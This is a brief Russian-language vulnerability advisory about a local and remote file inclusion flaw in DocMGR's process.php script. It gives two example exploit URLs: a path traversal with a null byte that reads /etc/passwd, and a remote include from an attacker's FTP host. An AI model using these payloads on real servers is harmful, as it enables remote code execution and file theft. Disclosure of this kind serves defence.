Программа: DocMGR 0.54.2, возможно более ранние
версии

Уязвимость существует из-за
недостаточной обработки входных данных в
параметрах "includeModule" и "siteModInfo" в
сценарии "/modules/center/admin/accounts/process.php".
Удаленный пользователь может с помощью
специально сформированного запроса
выполнить произвольный PHP сценарий на
целевой системе с привилегиями Web сервера.
Удачная эксплуатация уязвимости возможна
при включенной опции "register_globals".
Инклюдинг локальных файлов возможен при
выключенной опции "magic_quotes_gpc".
Инклюдинг удаленных файлов возможен с
удаленного FTP сервера и требует наличие PHP 5
на целевой системе.

Примеры:

PHP 4:

http://[target]/[path_to_docmgr]/modules/center/admin/ accounts/process.php?includeModule=suntzu&
siteModInfo[suntzu][module_path]= ../../../../../../../../../etc/passwd%00

PHP 5:

http://[target]/[path_to_docmgr]/modules/center/admin/ accounts/process.php?includeModule=suntzu&siteModInfo
[suntzu][module_path]=ftp://username:password@somehost.com/

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии